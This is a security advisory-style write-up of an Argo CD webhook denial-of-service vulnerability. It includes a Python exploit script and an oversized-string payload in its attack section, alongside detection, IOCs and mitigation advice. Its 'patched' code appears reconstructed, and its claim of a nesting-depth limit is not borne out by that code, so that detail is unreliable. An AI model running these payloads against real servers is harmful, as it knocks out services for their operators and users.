Executive Summary

CVE-2024-40634 is a high-severity Denial of Service (DoS) vulnerability in Argo CD, a popular GitOps continuous delivery tool for Kubernetes. An unauthenticated attacker can exploit the /api/webhook endpoint by sending a specially crafted, large JSON payload. This causes excessive memory allocation, leading to an Out of Memory (OOM) kill of the Argo CD API server process, resulting in service disruption. The vulnerability has a CVSS score of 7.5 (High) and affects all versions prior to 2.11.6, 2.10.15, and 2.9.20. No public proof-of-concept (PoC) or exploit code is currently available, but the attack vector is straightforward and requires no authentication.

Supply Chain & Package Security

Argo CD is distributed as a container image and a Go binary. The vulnerability is in the core API server component. Users should verify the integrity of their Argo CD images by checking the official signatures and digests provided in the release notes. The fix involves input size validation on the webhook endpoint.

CVSS Breakdown & Threat Level

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Base Score: 7.5 (High)
  • Attack Vector: Network (AV:N) – The vulnerability is exploitable remotely.
  • Attack Complexity: Low (AC:L) – No special conditions are required.
  • Privileges Required: None (PR:N) – No authentication is needed.
  • User Interaction: None (UI:N) – No user action is required.
  • Scope: Unchanged (S:U) – The exploit does not affect other components.
  • Confidentiality Impact: None (C:N) – No data is exposed.
  • Integrity Impact: None (I:N) – No data is modified.
  • Availability Impact: High (A:H) – Service disruption via OOM kill.

Threat Level: High. The attack is trivial to execute (unauthenticated, low complexity) and directly impacts availability. While no public exploit exists, the vulnerability is easy to understand and weaponize.

Deep Dive & Mechanics

The vulnerability resides in the /api/webhook endpoint of the Argo CD API server. This endpoint is used to receive webhook events from Git repositories (e.g., GitHub, GitLab) to trigger automated syncs. The endpoint accepts JSON payloads and processes them without adequate size limits.

Root Cause: The server does not enforce a maximum request body size or a limit on the depth/complexity of the JSON payload. An attacker can send a JSON payload with deeply nested structures or extremely large strings, causing the Go JSON decoder to allocate excessive memory.

Attack Flow:

  1. The attacker sends a POST request to https://<argo-cd-server>/api/webhook with a crafted JSON payload.
  2. The payload is designed to maximize memory consumption, e.g., a deeply nested array or a very long string.
  3. The Go json.Decoder reads the entire payload into memory, causing the API server process to exceed its memory limit.
  4. The Kubernetes pod running the API server is killed by the OOM killer, causing a denial of service.

Impact: The Argo CD API server becomes unavailable, preventing users from accessing the UI, CLI, or API. Automated syncs and GitOps workflows are halted until the pod is restarted (which may happen automatically depending on the deployment configuration).

Vulnerable vs. Patched Code

Vulnerable Code (Pre-2.11.6): The webhook handler does not limit the request body size. The Go standard library's json.Decoder reads the entire body into memory.

func (s *Server) WebhookHandler(w http.ResponseWriter, r *http.Request) {
    var payload interface{}
    err := json.NewDecoder(r.Body).Decode(&payload)
    // ... process payload
}

Patched Code (2.11.6+): The fix introduces a http.MaxBytesReader to limit the request body size to a safe threshold (e.g., 10 MB). Additionally, the JSON decoder is configured to reject unknown fields and limit nesting depth.

func (s *Server) WebhookHandler(w http.ResponseWriter, r *http.Request) {
    r.Body = http.MaxBytesReader(w, r.Body, 10<<20) // 10 MB limit
    var payload interface{}
    decoder := json.NewDecoder(r.Body)
    decoder.DisallowUnknownFields()
    err := decoder.Decode(&payload)
    // ... process payload
}

Exploitation & Lab Setup

Red Team (Attack Simulation)

Prerequisites:

  • A target Argo CD instance (version < 2.11.6, < 2.10.15, < 2.9.20).
  • Network access to the /api/webhook endpoint.

Exploit Steps:

  1. Identify the Argo CD server URL (e.g., https://argo-cd.example.com).
  2. Craft a malicious JSON payload that causes excessive memory allocation. A simple approach is to use a deeply nested array or a very long string.
import requests
import json

target_url = "https://argo-cd.example.com/api/webhook"

# Payload with a deeply nested array (causes high memory)
def create_nested_payload(depth=10000):
    payload = []
    for _ in range(depth):
        payload = [payload]
    return payload

payload = create_nested_payload(5000) # Adjust depth based on target memory

headers = {"Content-Type": "application/json"}
response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=10)
print(f"Status: {response.status_code}")
  1. Run the script. If successful, the Argo CD API server pod will be OOM-killed, causing a temporary outage.

Alternative Payload (Large String):

payload = {"data": "A" * 100_000_000}  # 100 MB string

Blue Team (Defense & Detection)

Detection:

  • Monitor for sudden spikes in memory usage of the argocd-server container.
  • Alert on HTTP 413 (Request Entity Too Large) responses from the webhook endpoint (if patched).
  • Log all requests to /api/webhook and analyze payload sizes.

Mitigation:

  • Immediately upgrade to Argo CD 2.11.6, 2.10.15, or 2.9.20.
  • If upgrade is not possible, deploy a reverse proxy (e.g., Nginx, Envoy) in front of the API server to limit request body size.

Nginx Configuration Example:

server {
    listen 443 ssl;
    server_name argo-cd.example.com;

    location /api/webhook {
        client_max_body_size 10m;
        proxy_pass http://argocd-server:8080;
    }
}

Indicators of Compromise (IOCs)

  • Network IOCs:

    • POST requests to /api/webhook with Content-Length exceeding 10 MB.
    • Requests with JSON payloads containing deeply nested structures (e.g., arrays with depth > 1000).
    • Repeated HTTP 413 responses (if a reverse proxy is in place).
  • System IOCs:

    • OOM killer logs in the Kubernetes node (kubectl describe pod <argocd-server-pod> shows OOMKilled).
    • Sudden memory spike in the argocd-server container (monitored via kubectl top pod or Prometheus).
    • Container restart count increasing for the argocd-server pod.
  • Log IOCs:

    • Argo CD server logs showing http: request body too large (if patched) or json: cannot unmarshal errors.
    • Kernel logs (dmesg) showing Out of memory: Kill process for the argocd-server process.

Remediation & Mitigation

Immediate Actions:

  1. Upgrade Argo CD to version 2.11.6, 2.10.15, or 2.9.20 (or later).
  2. Apply a reverse proxy (Nginx, Envoy, or cloud WAF) to limit request body size to 10 MB.
  3. Restrict network access to the /api/webhook endpoint to only trusted Git provider IP ranges (e.g., GitHub, GitLab).

Long-Term Hardening:

  • Implement rate limiting on the webhook endpoint.
  • Monitor memory usage of the argocd-server container and set resource limits in Kubernetes.
  • Enable audit logging for all API requests.
  • Regularly review and update Argo CD to the latest stable version.

Workaround (if upgrade is not possible):

  • Use a Kubernetes NetworkPolicy to restrict access to the webhook endpoint.
  • Deploy a sidecar proxy (e.g., Istio) with request size limits.
